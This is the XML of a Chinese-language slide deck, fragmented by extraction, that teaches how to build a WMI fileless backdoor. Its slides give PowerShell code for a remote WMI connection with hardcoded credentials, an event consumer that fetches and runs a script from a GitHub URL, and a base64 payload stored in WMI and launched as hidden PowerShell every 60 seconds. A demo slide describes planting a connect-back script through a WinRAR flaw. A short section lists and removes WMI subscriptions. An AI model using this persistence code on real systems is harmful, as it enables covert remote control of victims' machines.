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61" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="265" r:id="rId6"/>
    <p:sldId id="262" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="278" r:id="rId9"/>
    <p:sldId id="279" r:id="rId10"/>
    <p:sldId id="263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7466DD4-95FF-4944-B58F-A3E75DE5D0E4}">
          <p14:sldIdLst>
            <p14:sldId id="282"/>
            <p14:sldId id="257"/>
            <p14:sldId id="261"/>
            <p14:sldId id="260"/>
            <p14:sldId id="265"/>
            <p14:sldId id="262"/>
            <p14:sldId id="264"/>
            <p14:sldId id="278"/>
            <p14:sldId id="279"/>
            <p14:sldId id="263"/>
            <p14:sldId id="266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8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3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3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2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6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2D36-3EA5-4B67-83A3-52F49DFCCC18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F50B-FE7A-4D75-9721-029588E8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6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E50168-2D20-45FE-BE27-2C8301D47AB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2147400" y="2659559"/>
            <a:ext cx="48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无文件后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160937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B39149-0EBF-4BA0-B5FA-8FA590579155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2301987" y="2551837"/>
            <a:ext cx="45400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</a:p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83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 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AE937-852D-43EE-9BF9-BF80F2047367}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1540838" y="2289420"/>
            <a:ext cx="3235522" cy="302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 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代码执行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(1)WMI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32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 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370085" y="2830332"/>
            <a:ext cx="840383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zh-CN" altLang="en-US" sz="17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连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="170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192.168.40.206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$Options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New-Object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 err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Management.ConnectionOptions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRP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Options.Username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'a'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Options.Password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testtest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Options.EnablePrivileges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$True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$Connection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New-Object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 err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Management.ManagementScope</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRP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Connection.Path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'\\192.168.40.206\root\cimv2'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Connection.Optio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 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$Options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Connection.Connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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EvilClass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New-Object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 err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Management.ManagementClass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($Connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, [</a:t>
            </a:r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zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]::Empty, $null)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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A34A0E-CB56-4C71-AABC-7981ADD4EA63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370085" y="2289420"/>
            <a:ext cx="110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示例代码：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060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 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1922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370085" y="2830332"/>
            <a:ext cx="845487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consumerName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'consP1'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$Command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GetObject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(""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script:https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://raw.githubusercontent.com/3gstudent/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Javascript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-Backdoor/master/test"")"    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRP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WMIEventConsumer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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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WmiInstance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-Class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 err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ActiveScriptEventConsumer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-Namespace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"root\subscription"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-Arguments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@{Name = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>consumerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ScriptingEngine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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'Jscript'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ScriptText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = $Command}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0D6DE5-797A-4DB5-9BAA-5CAE1E1B4A65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370085" y="2289420"/>
            <a:ext cx="110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示例代码：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20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 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199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370085" y="2829313"/>
            <a:ext cx="8409931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对</a:t>
            </a:r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payload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作</a:t>
            </a:r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base64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加密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$bytes  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="17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System.Text.Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unicode.GetBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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$Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="17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EncodedPayload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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="17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System.Convert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]::ToBase64String(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$bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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存储加密后的</a:t>
            </a:r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payload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StaticClass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New-Object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 err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Management.ManagementClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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'root\cimv2'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700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en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700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$null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="17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StaticClass.Name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'Win32_Command'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StaticClass.Put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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StaticClass.Properties.Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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EnCommand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CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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EncodedPayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="17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StaticClass.Put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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45DF8D-8436-4BE3-A86E-DBD31429695D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370085" y="2289420"/>
            <a:ext cx="110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示例代码：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52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 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代码执行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370085" y="2830332"/>
            <a:ext cx="835666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读取加密</a:t>
            </a:r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payload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EncodedPayload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([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WmiClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]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'Win32_Command'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).Properties[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EnCommand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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>].Value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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#PowerShell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执行命令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PowerShellPayload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powershell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-ep bypass -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NoLogo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NonInteractive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NoProfile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-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WindowStyle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Hidden -enc $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EncodedPayload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Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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WmiMethod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-Class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Win32_Process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-Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Create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zh-CN" sz="17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ArgumentList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PowerShellPayload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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52C0B9-1DFE-41BA-919C-8CB290EC7A1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370085" y="2289420"/>
            <a:ext cx="110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示例代码：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420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 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370085" y="2830332"/>
            <a:ext cx="81172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filterName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'BotFilter56'</a:t>
            </a:r>
          </a:p>
          <a:p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创建一个</a:t>
            </a:r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zh-CN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EventFilter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，用于设定触发条件，每隔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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60s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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执行一次</a:t>
            </a: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$Query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"SELECT * FROM __</a:t>
            </a:r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InstanceModificationEvent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WITHIN 60 WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="17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TargetInstance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ISA 'Win32_PerfFormattedData_PerfOS_System'”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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WMIEventFilter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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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WmiInstance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-Class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EventFilter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zh-CN" sz="17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NameSpace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"root\subscription"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0"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-Arguments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@{Name = 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altLang="zh-CN" sz="17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filterName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EventNameSpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 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"root\cimv2"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700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</a:rPr>
              <a:t>;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 err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>QueryLanguage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 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"WQL"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="17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Query=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="17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$Query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}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zh-CN" sz="1700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ErrorAction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700" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Stop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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044F71-28B8-4B15-A41B-993C81A6E589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370085" y="2289420"/>
            <a:ext cx="1106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示例代码：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97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B39149-0EBF-4BA0-B5FA-8FA590579155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1609490" y="2551837"/>
            <a:ext cx="5925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0x03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN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如何防御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1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如何防御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281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 Event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513362" y="2289420"/>
            <a:ext cx="8117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#List Event Filters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Get-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-Namespace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root\Subscription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-Class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>EventFilter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#List Event Consumers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Get-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-Namespace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root\Subscription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-Class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>EventConsumer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#List Event Bindings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Get-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-Namespace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root\Subscription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-Class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>FilterToConsumerBinding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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1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如何防御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 Event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513362" y="2289420"/>
            <a:ext cx="8117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#Filter(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删除对应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Get-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-Namespace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root\Subscription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-Class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>EventFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -Filter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"Name='Name'"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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove-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-Verbose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#Consumer(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删除对应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__CLASS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Consumer)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Get-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-Namespace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root\Subscription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-Class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>__CLASS -Filter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"Name='Name'"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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove-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-Verbose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#Binding(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删除对应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Get-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-Namespace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root\Subscription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-Class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>FilterToConsumerBinding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-Filter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"__Path LIKE ‘%Name%'"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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WmiObject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-Verbose</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300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0644"/>
            <a:ext cx="20938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无文件后门</a:t>
            </a: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B39149-0EBF-4BA0-B5FA-8FA590579155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2389763" y="1817752"/>
            <a:ext cx="4185761" cy="324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0x01 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后门运行模式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0x02 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后门模块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0x03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如何防御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0x04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实践操作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61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B39149-0EBF-4BA0-B5FA-8FA590579155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3094673" y="2551837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0x04</a:t>
            </a:r>
          </a:p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实践操作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57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实践操作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FD3CA-F4D8-4286-985C-73FBB513468C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513362" y="1546150"/>
            <a:ext cx="8117275" cy="446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经过前面的介绍，现在我们可以构建一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>WMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>无文件后门，接下来我们的目的是能让目标主机开启后门，即让对方向我们的服务端建立连接。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我们选择使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Winrar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>解压文件时能让我们的建立连接脚本释放到自启动目录，当用户重启电脑后，脚本会通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使目标主机与服务端建立连接，并删除自身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（演示时附有实践操作视频一同讲解）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649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B39149-0EBF-4BA0-B5FA-8FA590579155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2648236" y="2551837"/>
            <a:ext cx="3847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</a:p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后门与</a:t>
            </a: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</a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427847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AE937-852D-43EE-9BF9-BF80F2047367}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501977" y="2117840"/>
            <a:ext cx="8140045" cy="182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500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Backdoor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，在信息安全领域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是指绕过安全控制而获取对程序或系统访问权的方法。后门的最主要目的就是方便以后再次秘密进入或者控制系统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什么是后门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0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1DC204-8CFA-4448-A62E-C6C04966A6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="171773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01442-83AF-4565-8F87-D68EB9F7653A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501977" y="2117840"/>
            <a:ext cx="8140045" cy="482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500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Management Instrumentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2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Windows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管理规范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是一项核心的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管理技术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WMI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作为一种规范和基础结构，它可以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访问、配置、管理和监视几乎所有的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设定一个在特定日期和时间运行的进程；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获得本地或远程计算机的已安装程序列表；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查询本地或远程计算机的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事件日志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5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AC3548-9B21-472F-A1C7-1287DAD54552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1146040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6C6B5D-F985-4613-AE62-A9B5C7AA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8" y="1546150"/>
            <a:ext cx="6175844" cy="51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DC3E34-7C54-4335-882B-BAD20FC7ED8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1146040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AE937-852D-43EE-9BF9-BF80F2047367}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
